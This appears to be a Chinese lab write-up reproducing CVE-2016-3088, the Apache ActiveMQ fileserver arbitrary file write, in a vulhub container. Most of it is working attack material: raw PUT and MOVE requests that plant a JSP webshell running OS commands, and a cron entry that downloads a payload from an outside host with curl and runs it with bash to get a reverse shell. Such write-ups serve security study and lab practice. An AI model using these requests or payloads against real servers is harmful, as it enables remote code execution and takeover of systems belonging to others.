漏洞背景

CVE-2016-3088，ActiveMQ<5.12.x容易存在。

• 框架介绍：Apache ActiveMQ是Apache软件基金会所研发的开放源代码消息中间件。
• 漏洞引入：ActiveMQ的web控制台分三个应用，admin、api和fileserver。其中admin是管理员页面，api是接口，admin和api都需要登录后才能使用；fileserver是一个RESTful API接口，我们可以通过GET、PUT、DELETE等HTTP请求对其中存储的文件进行读写操作，无需登录。fileserver支持写入文件（但不解析jsp），同时支持移动文件（MOVE请求）。所以，我们只需要写入一个文件，然后使用MOVE请求将其移动到任意位置，造成任意文件写入漏洞。ActiveMQ在5.12.x~5.13.x版本中，已经默认关闭了fileserver这个应用（可以在conf/jetty.xml中手动开启）；在5.14.0版本以后，彻底删除了fileserver应用。

漏洞特征

漏洞发现：nmap扫端口识别，默认8161
漏洞利用条件

• 写入jsp的webshell（需获取ActiveMQ账号密码&绝对路径）
• 写入cron或ssh key等文件（需为root）
• 写入jar或jetty.xml等库和配置文件（需知道activemq的绝对路径）

本地复现

activemq/CVE-2016-3088，将8161端口映射出来。

activemq的目录如下：

root@5f5b35d61130:/opt/activemq# ls
LICENSE  NOTICE  README.txt  activemq-all-5.11.1.jar  bin  conf  data  docs  examples  lib  tmp  webapps  webapps-demo
root@5f5b35d61130:/opt/activemq# ls webapps
admin  api  favicon.ico  fileserver  images  index.html  styles

姿势1：写入webshell

1. 访问http://10.154.7.128:28617/admin/test/systemProperties.jsp可使用admin:admin进行登录，查看ActiveMQ的绝对路径(activemq.home)为/opt/activemq。
2. bp直接上传webshell（记得修改request method）

PUT /fileserver/1.txt HTTP/1.1
Host: 10.154.7.128:28617
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 120976

<%
    if("023".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>

返回204则执行成功

HTTP/1.1 204 No Content
Connection: close
Server: Jetty(8.1.16.v20140903)

3. 移动到web目录下的api文件夹中，同样需返回204。（记得修改request method）

MOVE /fileserver/1.txt HTTP/1.1
Destination: file:///opt/activemq/webapps/api/shell.jsp
Host: 10.154.7.128:28617
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close

4. 访问webshell。http://10.154.7.128:28617/api/shell.jsp

姿势2：写入crontab反弹shell

1. bp上传（换行需从0d0a改成0a）

PUT /fileserver/1.txt HTTP/1.1
Host: 10.154.7.128:28617
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 56

* * * * * root curl -o /tmp/1 r.36huo.com/10.154.7.128/53
* * * * * root /bin/bash /tmp/1

反弹是可以的，但因为crontab的问题，环境变量不会自动读取。因为题目设置的docker启动的环境变量，肯定会作用在docker启动进程也就是进程1上。所以cat /proc/1/environ可以看到。

手动修改换行符

2.移动

MOVE /fileserver/1.txt HTTP/1.1
Destination: file:///etc/cron.d/root
Host: 10.154.7.128:28617
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close

3.监听端口反弹成功。

姿势3：写入jetty.xml或jar（待补）

覆盖jetty.xml，将admin和api的登录限制去掉，然后再写入webshell

总结

1. crontab不会缺省从用户profile文件中读取环境变量参数，解决方式还在研究。。。。

参考

• https://github.com/vulhub/vulhub/blob/master/activemq/CVE-2016-3088/README.zh-cn.md